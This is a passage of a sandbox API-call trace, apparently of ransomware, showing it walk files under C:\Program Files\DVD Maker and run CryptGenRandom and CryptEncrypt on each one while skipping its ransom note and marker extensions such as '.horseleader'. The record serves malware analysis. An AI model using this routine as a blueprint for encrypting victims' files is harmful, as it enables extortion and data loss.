nFileSizeHigh=0x0, nFileSizeLow=0xa942c, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Notes_loop.wmv", cAlternateFileName="")) returned 1 [0251.658] lstrcmpiW (lpString1="Notes_loop.wmv", lpString2="Windows") returned -1 [0251.658] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Notes_loop.wmv") returned 74 [0251.658] StrStrIW (lpFirst="Notes_loop.wmv", lpSrch=".horseleader") returned 0x0 [0251.658] lstrcmpW (lpString1="Notes_loop.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.658] lstrcmpW (lpString1="Notes_loop.wmv", lpString2="_uninstalling_.png") returned 1 [0251.658] lstrlenW (lpString=".testttjffg") returned 11 [0251.658] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Notes_loop.wmv", lpSrch=".testttjffg") returned 0x0 [0251.658] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.658] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.658] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Notes_loop.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\notes_loop.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.659] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7021cdb8, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7021cdb8, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4dc728c1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, 
nFileSizeLow=0xbebec, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Notes_loop_PAL.wmv", cAlternateFileName="")) returned 1 [0251.659] lstrcmpiW (lpString1="Notes_loop_PAL.wmv", lpString2="Windows") returned -1 [0251.659] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Notes_loop_PAL.wmv") returned 78 [0251.659] StrStrIW (lpFirst="Notes_loop_PAL.wmv", lpSrch=".horseleader") returned 0x0 [0251.659] lstrcmpW (lpString1="Notes_loop_PAL.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.659] lstrcmpW (lpString1="Notes_loop_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0251.659] lstrlenW (lpString=".testttjffg") returned 11 [0251.659] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Notes_loop_PAL.wmv", lpSrch=".testttjffg") returned 0x0 [0251.659] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.660] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.660] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Notes_loop_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\notes_loop_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.660] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7015e6e7, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7015e6e7, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4dd7d253, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, 
nFileSizeHigh=0x0, nFileSizeLow=0x11ad, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="ParentMenuButtonIcon.png", cAlternateFileName="")) returned 1 [0251.660] lstrcmpiW (lpString1="ParentMenuButtonIcon.png", lpString2="Windows") returned -1 [0251.660] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\ParentMenuButtonIcon.png") returned 84 [0251.660] StrStrIW (lpFirst="ParentMenuButtonIcon.png", lpSrch=".horseleader") returned 0x0 [0251.660] lstrcmpW (lpString1="ParentMenuButtonIcon.png", lpString2="#Decrypt#.txt") returned 1 [0251.660] lstrcmpW (lpString1="ParentMenuButtonIcon.png", lpString2="_uninstalling_.png") returned 1 [0251.660] lstrlenW (lpString=".testttjffg") returned 11 [0251.660] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\ParentMenuButtonIcon.png", lpSrch=".testttjffg") returned 0x0 [0251.660] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.660] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.660] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\ParentMenuButtonIcon.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\parentmenubuttonicon.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.661] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7015e6e7, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7015e6e7, ftLastAccessTime.dwHighDateTime=0x1ca03fb, 
ftLastWriteTime.dwLowDateTime=0x4dd7d253, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xbef, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="ParentMenuButtonIconSubpict.png", cAlternateFileName="")) returned 1 [0251.661] lstrcmpiW (lpString1="ParentMenuButtonIconSubpict.png", lpString2="Windows") returned -1 [0251.661] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\ParentMenuButtonIconSubpict.png") returned 91 [0251.661] StrStrIW (lpFirst="ParentMenuButtonIconSubpict.png", lpSrch=".horseleader") returned 0x0 [0251.661] lstrcmpW (lpString1="ParentMenuButtonIconSubpict.png", lpString2="#Decrypt#.txt") returned 1 [0251.661] lstrcmpW (lpString1="ParentMenuButtonIconSubpict.png", lpString2="_uninstalling_.png") returned 1 [0251.661] lstrlenW (lpString=".testttjffg") returned 11 [0251.661] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\ParentMenuButtonIconSubpict.png", lpSrch=".testttjffg") returned 0x0 [0251.661] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.661] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.661] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\ParentMenuButtonIconSubpict.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\parentmenubuttoniconsubpict.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.662] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70053d5c, 
ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70053d5c, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4dda33b1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x629b, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="performance.png", cAlternateFileName="")) returned 1 [0251.662] lstrcmpiW (lpString1="performance.png", lpString2="Windows") returned -1 [0251.662] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\performance.png") returned 75 [0251.662] StrStrIW (lpFirst="performance.png", lpSrch=".horseleader") returned 0x0 [0251.662] lstrcmpW (lpString1="performance.png", lpString2="#Decrypt#.txt") returned 1 [0251.662] lstrcmpW (lpString1="performance.png", lpString2="_uninstalling_.png") returned 1 [0251.662] lstrlenW (lpString=".testttjffg") returned 11 [0251.662] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\performance.png", lpSrch=".testttjffg") returned 0x0 [0251.662] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.662] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.662] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\performance.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\performance.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.663] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x700a0016, 
ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x700a0016, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4dd7d253, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1b0a, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Perf_Scenes_Mask1.png", cAlternateFileName="")) returned 1 [0251.663] lstrcmpiW (lpString1="Perf_Scenes_Mask1.png", lpString2="Windows") returned -1 [0251.663] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Perf_Scenes_Mask1.png") returned 81 [0251.663] StrStrIW (lpFirst="Perf_Scenes_Mask1.png", lpSrch=".horseleader") returned 0x0 [0251.663] lstrcmpW (lpString1="Perf_Scenes_Mask1.png", lpString2="#Decrypt#.txt") returned 1 [0251.663] lstrcmpW (lpString1="Perf_Scenes_Mask1.png", lpString2="_uninstalling_.png") returned 1 [0251.664] lstrlenW (lpString=".testttjffg") returned 11 [0251.664] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Perf_Scenes_Mask1.png", lpSrch=".testttjffg") returned 0x0 [0251.664] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.664] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.664] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Perf_Scenes_Mask1.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\perf_scenes_mask1.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.664] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, 
ftCreationTime.dwLowDateTime=0x700c6173, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x700c6173, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4dd7d253, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x135f, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Perf_Scenes_Subpicture1.png", cAlternateFileName="")) returned 1 [0251.664] lstrcmpiW (lpString1="Perf_Scenes_Subpicture1.png", lpString2="Windows") returned -1 [0251.664] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Perf_Scenes_Subpicture1.png") returned 87 [0251.664] StrStrIW (lpFirst="Perf_Scenes_Subpicture1.png", lpSrch=".horseleader") returned 0x0 [0251.664] lstrcmpW (lpString1="Perf_Scenes_Subpicture1.png", lpString2="#Decrypt#.txt") returned 1 [0251.664] lstrcmpW (lpString1="Perf_Scenes_Subpicture1.png", lpString2="_uninstalling_.png") returned 1 [0251.664] lstrlenW (lpString=".testttjffg") returned 11 [0251.664] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Perf_Scenes_Subpicture1.png", lpSrch=".testttjffg") returned 0x0 [0251.665] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.665] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.665] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Perf_Scenes_Subpicture1.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\perf_scenes_subpicture1.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.665] FindNextFileW (in: 
hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70269072, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70269072, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4dda33b1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1197, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="PreviousMenuButtonIcon.png", cAlternateFileName="")) returned 1 [0251.665] lstrcmpiW (lpString1="PreviousMenuButtonIcon.png", lpString2="Windows") returned -1 [0251.665] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\PreviousMenuButtonIcon.png") returned 86 [0251.665] StrStrIW (lpFirst="PreviousMenuButtonIcon.png", lpSrch=".horseleader") returned 0x0 [0251.665] lstrcmpW (lpString1="PreviousMenuButtonIcon.png", lpString2="#Decrypt#.txt") returned 1 [0251.665] lstrcmpW (lpString1="PreviousMenuButtonIcon.png", lpString2="_uninstalling_.png") returned 1 [0251.665] lstrlenW (lpString=".testttjffg") returned 11 [0251.665] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\PreviousMenuButtonIcon.png", lpSrch=".testttjffg") returned 0x0 [0251.665] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.665] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.665] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\PreviousMenuButtonIcon.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\previousmenubuttonicon.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.666] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x702b532c, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x702b532c, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4dda33b1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc0a, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="PreviousMenuButtonIconSubpi.png", cAlternateFileName="")) returned 1 [0251.666] lstrcmpiW (lpString1="PreviousMenuButtonIconSubpi.png", lpString2="Windows") returned -1 [0251.666] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\PreviousMenuButtonIconSubpi.png") returned 91 [0251.666] StrStrIW (lpFirst="PreviousMenuButtonIconSubpi.png", lpSrch=".horseleader") returned 0x0 [0251.666] lstrcmpW (lpString1="PreviousMenuButtonIconSubpi.png", lpString2="#Decrypt#.txt") returned 1 [0251.666] lstrcmpW (lpString1="PreviousMenuButtonIconSubpi.png", lpString2="_uninstalling_.png") returned 1 [0251.666] lstrlenW (lpString=".testttjffg") returned 11 [0251.666] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\PreviousMenuButtonIconSubpi.png", lpSrch=".testttjffg") returned 0x0 [0251.666] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.666] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.666] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\PreviousMenuButtonIconSubpi.png" (normalized: "c:\\program files\\dvd 
maker\\shared\\dvdstyles\\performance\\previousmenubuttoniconsubpi.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.667] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x700ec2d0, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x700ec2d0, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4dda33b1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc24, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="redmenu.png", cAlternateFileName="")) returned 1 [0251.667] lstrcmpiW (lpString1="redmenu.png", lpString2="Windows") returned -1 [0251.667] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\redmenu.png") returned 71 [0251.667] StrStrIW (lpFirst="redmenu.png", lpSrch=".horseleader") returned 0x0 [0251.667] lstrcmpW (lpString1="redmenu.png", lpString2="#Decrypt#.txt") returned 1 [0251.667] lstrcmpW (lpString1="redmenu.png", lpString2="_uninstalling_.png") returned 1 [0251.667] lstrlenW (lpString=".testttjffg") returned 11 [0251.667] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\redmenu.png", lpSrch=".testttjffg") returned 0x0 [0251.667] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.667] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.667] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\redmenu.png" (normalized: "c:\\program files\\dvd 
maker\\shared\\dvdstyles\\performance\\redmenu.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.668] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70327743, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70327743, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ddc950f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x8232c, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Scene_loop.wmv", cAlternateFileName="")) returned 1 [0251.668] lstrcmpiW (lpString1="Scene_loop.wmv", lpString2="Windows") returned -1 [0251.668] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Scene_loop.wmv") returned 74 [0251.668] StrStrIW (lpFirst="Scene_loop.wmv", lpSrch=".horseleader") returned 0x0 [0251.668] lstrcmpW (lpString1="Scene_loop.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.668] lstrcmpW (lpString1="Scene_loop.wmv", lpString2="_uninstalling_.png") returned 1 [0251.668] lstrlenW (lpString=".testttjffg") returned 11 [0251.668] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Scene_loop.wmv", lpSrch=".testttjffg") returned 0x0 [0251.668] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.668] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.668] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Scene_loop.wmv" (normalized: "c:\\program files\\dvd 
maker\\shared\\dvdstyles\\performance\\scene_loop.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.669] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70399b5a, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70399b5a, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4de61a87, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x95bac, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Scene_loop_PAL.wmv", cAlternateFileName="")) returned 1 [0251.669] lstrcmpiW (lpString1="Scene_loop_PAL.wmv", lpString2="Windows") returned -1 [0251.669] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Scene_loop_PAL.wmv") returned 78 [0251.669] StrStrIW (lpFirst="Scene_loop_PAL.wmv", lpSrch=".horseleader") returned 0x0 [0251.669] lstrcmpW (lpString1="Scene_loop_PAL.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.669] lstrcmpW (lpString1="Scene_loop_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0251.669] lstrlenW (lpString=".testttjffg") returned 11 [0251.669] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Scene_loop_PAL.wmv", lpSrch=".testttjffg") returned 0x0 [0251.669] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.669] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.670] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Scene_loop_PAL.wmv" (normalized: "c:\\program 
files\\dvd maker\\shared\\dvdstyles\\performance\\scene_loop_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.670] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7011242d, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7011242d, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4e53996b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x99, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="TitleButtonIcon.png", cAlternateFileName="")) returned 1 [0251.670] lstrcmpiW (lpString1="TitleButtonIcon.png", lpString2="Windows") returned -1 [0251.670] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\TitleButtonIcon.png") returned 79 [0251.670] StrStrIW (lpFirst="TitleButtonIcon.png", lpSrch=".horseleader") returned 0x0 [0251.670] lstrcmpW (lpString1="TitleButtonIcon.png", lpString2="#Decrypt#.txt") returned 1 [0251.670] lstrcmpW (lpString1="TitleButtonIcon.png", lpString2="_uninstalling_.png") returned 1 